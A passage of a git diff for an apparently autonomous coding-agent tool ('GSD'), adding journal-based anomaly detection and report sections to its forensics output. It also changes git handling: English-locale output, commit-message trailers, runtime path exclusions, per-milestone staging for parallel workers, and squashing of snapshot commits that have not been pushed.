stuckCount = journal.eventCounts["stuck-detected"] ?? 0; + if (stuckCount > 0) { + anomalies.push({ + type: "journal-stuck", + severity: stuckCount >= 3 ? "error" : "warning", + summary: `Journal recorded ${stuckCount} stuck-detected event(s)`, + details: `The auto-mode loop detected it was stuck ${stuckCount} time(s). Check journal events for flow IDs and causal chains to trace the root cause.`, + }); + } + + // Detect guard-block events (dispatch was blocked by a guard) + const guardCount = journal.eventCounts["guard-block"] ?? 0; + if (guardCount > 0) { + anomalies.push({ + type: "journal-guard-block", + severity: guardCount >= 5 ? "warning" : "info", + summary: `Journal recorded ${guardCount} guard-block event(s)`, + details: `Dispatch was blocked by a guard condition ${guardCount} time(s). This may indicate a persistent blocking condition preventing progress.`, + }); + } + + // Detect rapid iterations (many flows in short time = likely thrashing) + if (journal.flowCount > 0 && journal.oldestEntry && journal.newestEntry) { + const oldest = new Date(journal.oldestEntry).getTime(); + const newest = new Date(journal.newestEntry).getTime(); + const spanMs = newest - oldest; + if (spanMs > 0 && journal.flowCount > 10) { + const avgMs = spanMs / journal.flowCount; + if (avgMs < RAPID_ITERATION_THRESHOLD_MS) { + anomalies.push({ + type: "journal-rapid-iterations", + severity: "warning", + summary: `${journal.flowCount} iterations in ${formatDuration(spanMs)} (avg ${formatDuration(avgMs)}/iteration)`, + details: `Unusually rapid iteration cadence suggests the loop may be thrashing without making progress. Review recent journal events for dispatch-stop or terminal events.`, + }); + } + } + } + + // Detect worktree failures from journal events + const wtCreateFailed = journal.eventCounts["worktree-create-failed"] ?? 0; + const wtMergeFailed = journal.eventCounts["worktree-merge-failed"] ?? 0; + const wtFailures = wtCreateFailed + wtMergeFailed; + if (wtFailures > 0) { + const parts: string[] = []; + if (wtCreateFailed > 0) parts.push(`${wtCreateFailed} create failure(s)`); + if (wtMergeFailed > 0) parts.push(`${wtMergeFailed} merge failure(s)`); + anomalies.push({ + type: "journal-worktree-failure", + severity: "warning", + summary: `Worktree failures: ${parts.join(", ")}`, + details: `Journal recorded worktree operation failures. These may indicate git state corruption or conflicting branches.`, + }); + } +} + // ─── Report Persistence ─────────────────────────────────────────────────────── function saveForensicReport(basePath: string, report: ForensicReport, problemDescription: string): string { @@ -508,10 +949,85 @@ function saveForensicReport(basePath: string, report: ForensicReport, problemDes sections.push(redact(formatCrashInfo(report.crashLock)), ``); } + // Activity log metadata + if (report.activityLogMeta) { + const meta = report.activityLogMeta; + sections.push(`## Activity Log Metadata`, ``); + sections.push(`- Files: ${meta.fileCount}`); + sections.push(`- Total size: ${(meta.totalSizeBytes / 1024).toFixed(1)} KB`); + if (meta.oldestFile) sections.push(`- Oldest: ${meta.oldestFile}`); + if (meta.newestFile) sections.push(`- Newest: ${meta.newestFile}`); + sections.push(``); + } + + // Journal summary + if (report.journalSummary) { + const js = report.journalSummary; + sections.push(`## Journal Summary`, ``); + sections.push(`- Total entries: ${js.totalEntries}`); + sections.push(`- Distinct flows (iterations): ${js.flowCount}`); + sections.push(`- Daily files: ${js.fileCount}`); + if (js.oldestEntry) sections.push(`- Date range: ${js.oldestEntry} — ${js.newestEntry}`); + sections.push(``); + sections.push(`### Event Type Distribution`, ``); + sections.push(`| Event Type | Count |`); + sections.push(`|------------|-------|`); + for (const [evType, count] of Object.entries(js.eventCounts).sort((a, b) => b[1] - a[1])) { + sections.push(`| ${evType} | ${count} |`); + } + sections.push(``); + if (js.recentEvents.length > 0) { + sections.push(`### Recent Journal Events (last ${js.recentEvents.length})`, ``); + for (const ev of js.recentEvents) { + const parts = [`${ev.ts} [${ev.eventType}] flow=${ev.flowId.slice(0, 8)}`]; + if (ev.rule) parts.push(`rule=${ev.rule}`); + if (ev.unitId) parts.push(`unit=${ev.unitId}`); + sections.push(`- ${parts.join(" ")}`); + } + sections.push(``); + } + } + writeFileSync(filePath, sections.join("\n"), "utf-8"); return filePath; } +// ─── Forensics Session Marker ──────────────────────────────────────────────── + +export interface ForensicsMarker { + reportPath: string; + promptContent: string; + createdAt: string; +} + +/** + * Write a marker file so that buildBeforeAgentStartResult() can re-inject + * the forensics prompt on follow-up turns. (#2941) + */ +export function writeForensicsMarker(basePath: string, reportPath: string, promptContent: string): void { + const dir = join(gsdRoot(basePath), "runtime"); + mkdirSync(dir, { recursive: true }); + const marker: ForensicsMarker = { + reportPath, + promptContent, + createdAt: new Date().toISOString(), + }; + writeFileSync(join(dir, "active-forensics.json"), JSON.stringify(marker), "utf-8"); +} + +/** + * Read the active forensics marker, or null if none exists. + */ +export function readForensicsMarker(basePath: string): ForensicsMarker | null { + const markerPath = join(gsdRoot(basePath), "runtime", "active-forensics.json"); + if (!existsSync(markerPath)) return null; + try { + return JSON.parse(readFileSync(markerPath, "utf-8")) as ForensicsMarker; + } catch { + return null; + } +} + // ─── Prompt Formatter ───────────────────────────────────────────────────────── function formatReportForPrompt(report: ForensicReport): string { @@ -589,8 +1105,51 @@ function formatReportForPrompt(report: ForensicReport): string { sections.push(""); } - // Completed keys count - sections.push(`### Completed Keys: ${report.completedKeys.length}`); + // Activity log metadata + if (report.activityLogMeta) { + const meta = report.activityLogMeta; + sections.push("### Activity Log Overview"); + sections.push(`- Files: ${meta.fileCount}, Total size: ${(meta.totalSizeBytes / 1024).toFixed(1)} KB`); + if (meta.oldestFile) sections.push(`- Oldest: ${meta.oldestFile}`); + if (meta.newestFile) sections.push(`- Newest: ${meta.newestFile}`); + sections.push(""); + } + + // Journal summary — structured event timeline + if (report.journalSummary) { + const js = report.journalSummary; + sections.push("### Journal Summary (Iteration Event Log)"); + sections.push(`- Total entries: ${js.totalEntries}, Distinct flows: ${js.flowCount}, Daily files: ${js.fileCount}`); + if (js.oldestEntry) sections.push(`- Date range: ${js.oldestEntry} — ${js.newestEntry}`); + + // Event type distribution (compact) + const eventPairs = Object.entries(js.eventCounts).sort((a, b) => b[1] - a[1]); + sections.push(`- Events: ${eventPairs.map(([t, c]) => `${t}(${c})`).join(", ")}`); + + // Recent events timeline (for tracing what just happened) + if (js.recentEvents.length > 0) { + sections.push(""); + sections.push(`**Recent Journal Events (last ${js.recentEvents.length}):**`); + for (const ev of js.recentEvents) { + const parts = [`${ev.ts} [${ev.eventType}] flow=${ev.flowId.slice(0, 8)}`]; + if (ev.rule) parts.push(`rule=${ev.rule}`); + if (ev.unitId) parts.push(`unit=${ev.unitId}`); + sections.push(`- ${parts.join(" ")}`); + } + } + sections.push(""); + } + + // Completion status — prefer DB counts, fall back to legacy completed-units.json + if (report.dbCompletionCounts) { + const c = report.dbCompletionCounts; + sections.push(`### Completion Status (from DB)`); + sections.push(`- ${c.milestones}/${c.milestonesTotal} milestones complete`); + sections.push(`- ${c.slices}/${c.slicesTotal} slices complete`); + sections.push(`- ${c.tasks}/${c.tasksTotal} tasks complete`); + } else { + sections.push(`### Completed Keys: ${report.completedKeys.length}`); + } sections.push(`### GSD Version: ${report.gsdVersion}`); sections.push(`### Active Milestone: ${report.activeMilestone ?? "none"}`); sections.push(`### Active Slice: ${report.activeSlice ?? "none"}`); diff --git a/src/resources/extensions/gsd/git-constants.ts b/src/resources/extensions/gsd/git-constants.ts index 7213798ca..4925f4271 100644 --- a/src/resources/extensions/gsd/git-constants.ts +++ b/src/resources/extensions/gsd/git-constants.ts @@ -8,4 +8,5 @@ export const GIT_NO_PROMPT_ENV = { GIT_TERMINAL_PROMPT: "0", GIT_ASKPASS: "", GIT_SVN_ID: "", + LC_ALL: "C", // force English git output so stderr string checks work on all locales (#1997) }; diff --git a/src/resources/extensions/gsd/git-service.ts b/src/resources/extensions/gsd/git-service.ts index 00b4f717f..ae73a0e94 100644 --- a/src/resources/extensions/gsd/git-service.ts +++ b/src/resources/extensions/gsd/git-service.ts @@ -9,7 +9,7 @@ */ import { execFileSync, execSync } from "node:child_process"; -import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs"; +import { existsSync, mkdirSync, readFileSync, readdirSync, writeFileSync } from "node:fs"; import { join } from "node:path"; import { gsdRoot } from "./paths.js"; import { GIT_NO_PROMPT_ENV } from "./git-constants.js"; @@ -18,8 +18,8 @@ import { loadEffectiveGSDPreferences } from "./preferences.js"; import { detectWorktreeName, - SLICE_BRANCH_RE, } from "./worktree.js"; +import { SLICE_BRANCH_RE, QUICK_BRANCH_RE, WORKFLOW_BRANCH_RE } from "./branch-patterns.js"; import { nativeGetCurrentBranch, nativeDetectMainBranch, @@ -32,6 +32,8 @@ import { nativeRmCached, nativeUpdateRef, nativeAddPaths, + nativeResetSoft, + nativeCommitSubject, } from "./native-git-bridge.js"; import { GSDError, GSD_MERGE_CONFLICT, GSD_GIT_ERROR } from "./errors.js"; import { getErrorMessage } from "./error-utils.js"; @@ -50,9 +52,9 @@ export interface GitPreferences { main_branch?: string; merge_strategy?: "squash" | "merge"; /** Controls auto-mode git isolation strategy. - * - "worktree": (default) creates a milestone worktree for isolated work + * - "worktree": creates a milestone worktree for isolated work * - "branch": works directly in the project root (for submodule-heavy repos) - * - "none": no git isolation — commits land on the user's current branch directly + * - "none": (default) no git isolation — commits land on the user's current branch directly */ isolation?: "worktree" | "branch" | "none"; /** When false, GSD will not modify .gitignore at all — no baseline patterns @@ -77,6 +79,11 @@ export interface GitPreferences { * Default: the main branch (from `main_branch` or auto-detected). */ pr_target_branch?: string; + /** Whether to squash `gsd snapshot:` commits into the next real autoCommit. + * Enabled by default. Set to false to keep snapshot commits in history + * for forensic inspection. + */ + absorb_snapshot_commits?: boolean; } export const VALID_BRANCH_NAME = /^[a-zA-Z0-9_\-\/.]+$/; @@ -102,23 +109,25 @@ export interface TaskCommitContext { /** * Build a meaningful conventional commit message from task execution context. - * Format: `{type}({sliceId}/{taskId}): {description}` + * Format: `{type}: {description}` (clean conventional commit — no GSD IDs in subject). + * + * GSD metadata is placed in a `GSD-Task:` git trailer at the end of the body, + * following the same convention as `Signed-off-by:` or `Co-Authored-By:`. * * The description is the task summary one-liner if available (it describes * what was actually built), falling back to the task title (what was planned). */ export function buildTaskCommitMessage(ctx: TaskCommitContext): string { - const scope = ctx.taskId; // e.g. "S01/T02" or just "T02" const description = ctx.oneLiner || ctx.taskTitle; const type = inferCommitType(ctx.taskTitle, ctx.oneLiner); - // Truncate description to ~72 chars for subject line - const maxDescLen = 68 - type.length - scope.length; + // Truncate description to ~72 chars for subject line (full budget without scope) + const maxDescLen = 70 - type.length; const truncated = description.length > maxDescLen ? description.slice(0, maxDescLen - 1).trimEnd() + "…" : description; - const subject = `${type}(${scope}): ${truncated}`; + const subject = `${type}: ${truncated}`; // Build body with key files if available const bodyParts: string[] = []; @@ -131,15 +140,14 @@ export function buildTaskCommitMessage(ctx: TaskCommitContext): string { bodyParts.push(fileLines); } + // Trailers: GSD-Task first, then Resolves + bodyParts.push(`GSD-Task: ${ctx.taskId}`); + if (ctx.issueNumber) { bodyParts.push(`Resolves #${ctx.issueNumber}`); } - if (bodyParts.length > 0) { - return `${subject}\n\n${bodyParts.join("\n\n")}`; - } - - return subject; + return `${subject}\n\n${bodyParts.join("\n\n")}`; } /** @@ -196,6 +204,10 @@ export const RUNTIME_EXCLUSION_PATHS: readonly string[] = [ ".gsd/completed-units.json", ".gsd/STATE.md", ".gsd/gsd.db", + ".gsd/gsd.db-shm", // SQLite WAL sidecar — always created alongside gsd.db (#2296) + ".gsd/gsd.db-wal", // SQLite WAL sidecar — always created alongside gsd.db (#2296) + ".gsd/journal/", // daily-rotated JSONL event journal (#2296) + ".gsd/doctor-history.jsonl", // doctor run history (#2296) ".gsd/DISCUSSION-MANIFEST.json", ]; @@ -238,14 +250,13 @@ export function readIntegrationBranch(basePath: string, milestoneId: string): st * * The file is committed immediately so the metadata is persisted in git. */ -/** Regex matching GSD quick-task branches: gsd/quick/- */ -export const QUICK_BRANCH_RE = /^gsd\/quick\//; +/** Re-export for backward compatibility — canonical definitions in branch-patterns.ts */ +export { QUICK_BRANCH_RE, WORKFLOW_BRANCH_RE } from "./branch-patterns.js"; export function writeIntegrationBranch( basePath: string, milestoneId: string, branch: string, - _options?: { commitDocs?: boolean }, ): void { // Don't record slice branches as the integration target if (SLICE_BRANCH_RE.test(branch)) return; @@ -253,6 +264,10 @@ export function writeIntegrationBranch( // to their origin branch on completion. Recording one as the integration // target causes milestone merges to land on the wrong branch (#1293). if (QUICK_BRANCH_RE.test(branch)) return; + // Don't record workflow-template branches (hotfix, bugfix, spike, etc.) — + // same root cause as quick-task branches (#2498). All templates create + // gsd// branches that are ephemeral. + if (WORKFLOW_BRANCH_RE.test(branch)) return; // Validate if (!VALID_BRANCH_NAME.test(branch)) return; // Skip if already recorded with the same branch (idempotent across restarts). @@ -437,11 +452,6 @@ export class GitServiceImpl { this._milestoneId = milestoneId; } - /** Convenience wrapper: run git in this repo's basePath. */ - private git(args: string[], options: { allowFailure?: boolean; input?: string } = {}): string { - return runGit(this.basePath, args, options); - } - /** * Smart staging: `git add -A` excluding GSD runtime paths via pathspec. * Falls back to plain `git add -A` if the exclusion pathspec fails. @@ -485,6 +495,29 @@ export class GitServiceImpl { // If .gsd/ IS in .gitignore (the default for external state projects), // git add -A already skips it and the exclusions are harmless no-ops. const allExclusions = [...RUNTIME_EXCLUSION_PATHS, ...extraExclusions]; + + // ── Parallel worker milestone scope (#1991) ── + // When GSD_MILESTONE_LOCK is set, this process is a parallel worker that + // must only commit files belonging to its own milestone. Exclude all other + // milestone directories from staging to prevent cross-milestone pollution + // (e.g., an M033 worker fabricating M032 artifacts in the same commit). + const milestoneLock = process.env.GSD_MILESTONE_LOCK; + if (milestoneLock) { + const msDir = join(gsdRoot(this.basePath), "milestones"); + if (existsSync(msDir)) { + try { + const entries = readdirSync(msDir, { withFileTypes: true }); + for (const entry of entries) { + if (entry.isDirectory() && entry.name !== milestoneLock) { + allExclusions.push(`.gsd/milestones/${entry.name}/`); + } + } + } catch { + // Best-effort — if we can't read the milestones dir, proceed without scoping + } + } + } + nativeAddAllWithExclusions(this.basePath, allExclusions); } @@ -535,11 +568,97 @@ export class GitServiceImpl { const message = taskContext ? buildTaskCommitMessage(taskContext) - : `chore(${unitId}): auto-commit after ${unitType}`; + : `chore: auto-commit after ${unitType}\n\nGSD-Unit: ${unitId}`; nativeCommit(this.basePath, message, { allowEmpty: false }); + + // Absorb any preceding gsd snapshot commits into this real commit. + // Walk backwards from HEAD~1 counting consecutive snapshot subjects, + // then soft-reset to before them and re-commit with the same message. + this.absorbSnapshotCommits(message); + return message; } + /** + * Squash consecutive `gsd snapshot:` commits that sit immediately below + * HEAD into the current HEAD commit. This keeps the git history clean + * after automated snapshot commits are superseded by real work. + * + * Guards: + * - Opt-in via `absorb_snapshot_commits` preference (default: true). + * - Refuses to rewrite commits that have been pushed to the remote + * tracking branch (checks merge-base ancestry). + * - Saves HEAD SHA before reset; restores it if the re-commit fails. + * + * Does nothing if there are no snapshot commits to absorb. + */ + private absorbSnapshotCommits(headMessage: string): void { + try { + // Opt-in guard — users can disable to keep snapshot commits for forensics + if (this.prefs.absorb_snapshot_commits === false) return; + + const GSD_SNAPSHOT_PREFIX = "gsd snapshot:"; + let count = 0; + + // Walk back from HEAD~1 counting consecutive snapshot commits (cap at 10) + for (let i = 1; i <= 10; i++) { + const subject = nativeCommitSubject(this.basePath, `HEAD~${i}`); + if (!subject.startsWith(GSD_SNAPSHOT_PREFIX)) break; + count = i; + } + + if (count === 0) return; + + // Guard: don't rewrite history that has been pushed to the remote. + // Check whether the newest snapshot commit (HEAD~1) is already + // reachable from the remote tracking branch. If it is, the snapshots + // have been pushed and must not be squashed via local history rewrite. + // (Checking resetTarget instead would false-positive when the remote + // is at the pre-snapshot base but the snapshots themselves are local.) + const resetTarget = `HEAD~${count + 1}`; + try { + const branch = nativeGetCurrentBranch(this.basePath); + if (branch) { + const remoteBranch = `origin/${branch}`; + // merge-base --is-ancestor exits 0 if HEAD~1 is ancestor of remote + execFileSync("git", ["merge-base", "--is-ancestor", "HEAD~1", remoteBranch], { + cwd: this.basePath, + stdio: ["ignore", "pipe", "pipe"], + }); + // If we get here, newest snapshot IS reachable from remote — already pushed + return; + } + } catch { + // Not an ancestor or remote doesn't exist — safe to proceed + } + + // Save HEAD SHA so we can restore if the re-commit fails + const savedHead = execFileSync("git", ["rev-parse", "HEAD"], { + cwd: this.basePath, + stdio: ["ignore", "pipe", "pipe"], + encoding: "utf-8", + }).trim(); + + nativeResetSoft(this.basePath, resetTarget); + + // Re-run smartStage so the same RUNTIME_EXCLUSION_PATHS apply. + // Snapshot commits used nativeAddTracked (git add -u) which stages + // ALL tracked modifications including .gsd/ state files. Without + // re-staging, those .gsd/ changes leak into the absorbed commit. + this.smartStage(); + + try { + nativeCommit(this.basePath, headMessage, { allowEmpty: false }); + } catch { + // Re-commit failed — restore original HEAD to avoid leaving the + // repo in a partially-reset state with no commit + nativeResetSoft(this.basePath, savedHead); + } + } catch { + // Non-fatal — if squash fails, the commits remain unsquashed + } + } + // ─── Branch Queries ──────────────────────────────────────────────────── /** @@ -600,18 +719,14 @@ export class GitServiceImpl { return nativeGetCurrentBranch(this.basePath); } - /** True if currently on a GSD slice branch. */ - // ─── Branch Lifecycle ────────────────────────────────────────────────── - - // ─── S05 Features ───────────────────────────────────────────────────── - /** * Create a snapshot ref for the given label (typically a slice branch name). - * Gated on prefs.snapshots === true. Ref path: refs/gsd/snapshots/